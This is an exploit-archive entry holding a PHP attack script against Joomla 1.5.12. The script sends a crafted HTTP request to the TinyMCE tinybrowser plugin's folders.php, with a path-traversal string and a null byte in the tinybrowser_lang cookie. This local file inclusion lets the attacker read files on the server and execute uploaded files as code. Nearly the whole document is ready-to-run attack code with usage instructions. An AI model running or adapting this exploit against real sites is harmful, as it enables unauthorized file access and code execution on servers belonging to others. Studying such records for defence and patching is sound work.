Joomla 1.5.12 read/exec remote files

2010-01-26T00:00:00
ID 1337DAY-ID-10722
Type zdt
Reporter Nikoal Petrov
Modified 2010-01-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================
Joomla 1.5.12 read/exec remote files
====================================

<?php
    /*
        Copyright (c) ITIX LTD
 
        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.
 
        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.
 
        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
        TITLE:      Joomla 1.5.12 read/exec remote files
        AUTHOR:     Nikola Petrov ([email protected])
        VERSION:    1.0
        LICENSE:    GNU General Public License
 
        Platform: Joomla 1.5.12
        Vulnerabilities discovery and implementation: Nikola Petrov 
        Date: 27.08.2009
    */
     
    print "\n\n#########################################################################\n";
    print "# LFI discovery and implementation: Nikola Petrov ([email protected])\n";
    print "# Date: 27.08.2009\n";
    print "#########################################################################\n\n";
 
    if($argc < 4) {
        print "usage: php ". $argv[0] ." host path file [port] [debug]\n";
        print "example: php ". $argv[0] ." localhost /j1512 ../../../../../../../../wamp/www/j1512/images/stories/duck.jpg 80 1\n";
        exit();
    }
     
    $Host = $argv[1];
    $Path = $argv[2] . '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php';
    $File = $argv[3] . '%00';
     
    empty($argv[4]) ? $Port = 80 : $Port = $argv[4];
    empty($argv[5]) ? $Debug = 0 : $Debug = 1;
 
    function HttpSend($aHost, $aPort, $aPacket) {
        $Response = "";
 
        if(!$Socket = fsockopen($aHost, $aPort)) {
            print "Error connecting to $aHost:$aPort\n\n";
            exit();
        }
         
        fputs($Socket, $aPacket);
         
        while(!feof($Socket)) $Response .= fread($Socket, 1024);
         
        fclose($Socket);
         
        return $Response;
    }
     
    $Packet  = "GET {$Path} HTTP/1.0\r\n";
    $Packet .= "Host: {$Host}\r\n";
    $Packet .= "Cookie: tinybrowser_lang={$File}\r\n";
    $Packet .= "Connection: close\r\n\r\n";
     
    if($Debug) {
        print "Request to '$Host:$Port':\n";
        print $Packet;
    }
     
    print HttpSend($Host, $Port, $Packet);
?>



#  0day.today [2018-03-10]  #